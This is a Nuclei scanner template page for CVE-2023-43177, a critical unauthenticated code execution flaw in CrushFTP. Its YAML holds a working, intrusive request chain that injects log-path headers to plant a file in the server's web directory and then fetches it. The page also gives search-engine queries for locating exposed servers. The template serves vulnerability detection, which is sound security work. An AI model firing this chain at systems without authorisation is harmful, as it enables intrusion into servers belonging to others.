Skip to content
Nuclei Templates

CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution

ID: CVE-2023-43177

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2023,crushftp,unauth,rce,intrusive

Description

Section titled “Description”

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.

YAML Source

Section titled “YAML Source”
id: CVE-2023-43177


info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
    - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.96402
    epss-percentile: 0.99567
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
    shodan-query: http.html:"crushftp"
    fofa-query: body="crushftp"
  tags: cve,cve2023,crushftp,unauth,rce,intrusive
flow: http(1) && http(2) && http(3)


variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"


http:
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"


    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")


  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"


    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{dirname}}
      user_log_path: "./WebInterface/{{dirname}}/"
      user_log_file: "{{filename}}"
      Content-Type: application/x-www-form-urlencoded


    body: |
      post=body


    matchers:
      - type: regex
        regex:
          - "crushadmin"


  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"


    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and
# digest: 4b0a00483046022100da1be9bda7a4a1db7844d822a8464aea99257d95cbaf49714fd8ee4a1c174aee022100995a173742f84a638b11bf5ced81b58c16b498598514ce09c516300fa05bbf0d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-43177.yaml"

View on Github